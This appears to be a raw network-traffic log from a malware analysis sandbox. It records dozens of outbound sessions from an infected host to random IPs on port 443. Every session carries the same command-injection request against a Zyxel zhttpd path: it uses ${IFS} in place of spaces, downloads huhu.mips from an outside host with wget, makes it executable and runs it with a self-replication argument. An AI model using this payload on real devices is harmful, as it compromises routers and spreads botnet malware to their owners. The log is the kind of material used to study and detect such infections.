                                                      Feb 2, 2024 06:35:41.378007889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1522192.168.2.145173841.74.49.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.378036976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1523192.168.2.145476888.217.11.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.378096104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1524192.168.2.145687634.239.202.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.378123045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1525192.168.2.1450272130.24.119.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.378161907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1526192.168.2.1439002170.17.132.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.378217936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1527192.168.2.1453948183.102.33.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.378256083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1528192.168.2.145975260.163.234.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.378288984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1529192.168.2.145685836.142.99.185443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.378365993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1530192.168.2.143650438.41.69.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.378372908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1531192.168.2.1434330198.246.2.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.378413916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1532192.168.2.145010873.143.25.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.378473043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1533192.168.2.145121825.37.194.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.378482103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1534192.168.2.145613674.228.58.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.378554106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1535192.168.2.1460182154.133.135.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.378566980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1536192.168.2.1438000217.247.144.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.378582954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1537192.168.2.1436878216.178.242.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.378638029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1538192.168.2.1444750159.141.47.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.378670931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1539192.168.2.1460432138.104.117.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.378721952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1540192.168.2.1456722174.116.227.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.378772974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1541192.168.2.1445818167.150.201.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.378814936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1542192.168.2.1455850143.93.135.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.378844976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1543192.168.2.145070013.30.92.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.378886938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1544192.168.2.1454864179.251.75.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.378945112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1545192.168.2.145280296.112.11.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.378984928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1546192.168.2.145374027.78.212.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.379019022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1547192.168.2.1456558113.95.187.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.379045010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1548192.168.2.14586468.19.131.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.379091978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1549192.168.2.143852869.131.228.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.379125118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1550192.168.2.1440208204.136.51.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.379190922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1551192.168.2.1447026112.157.202.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.379226923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1552192.168.2.146050660.71.152.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.379260063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1553192.168.2.1457334199.57.53.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.379281044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1554192.168.2.1433952140.183.160.188443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.379329920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1555192.168.2.1443590136.230.84.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.379384995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1556192.168.2.144827848.222.80.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.379436970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1557192.168.2.1449746182.44.146.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.379460096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1558192.168.2.1458670126.202.65.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.379509926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1559192.168.2.1436268106.19.65.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.379556894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1560192.168.2.1460946186.81.121.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.379599094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1561192.168.2.1449856223.184.61.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.379626989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1562192.168.2.144170457.239.34.65443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.379652977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1563192.168.2.1447206171.54.82.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.379697084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1564192.168.2.14499901.245.112.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.379720926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1565192.168.2.145660067.107.44.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.379765034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1566192.168.2.1451702144.85.59.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.379781008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1567192.168.2.1454740213.21.187.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.379801035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1568192.168.2.14382861.31.78.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.379844904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1569192.168.2.1438210102.254.211.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.379885912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1570192.168.2.144184872.190.190.174443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.379899025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1571192.168.2.144118876.114.75.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.379951954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1572192.168.2.1438838140.231.156.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.380002975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1573192.168.2.1439926150.42.195.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.380040884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1574192.168.2.1447998182.1.17.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.380114079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1575192.168.2.143356678.192.247.7443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.380153894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1576192.168.2.145443684.153.76.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.380177975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1577192.168.2.1442110155.109.149.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.380209923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1578192.168.2.1439912201.71.72.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.380258083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1579192.168.2.1436848100.41.137.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.380281925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1580192.168.2.1448174126.38.228.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.380316019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1581192.168.2.1446146186.210.23.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.380357027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1582192.168.2.1440988190.196.146.229443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.380376101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1583192.168.2.1457242113.202.52.202443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:41.380415916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1584192.168.2.1445312159.91.126.252443
                                                      TimestampBytes transferredDirectionData
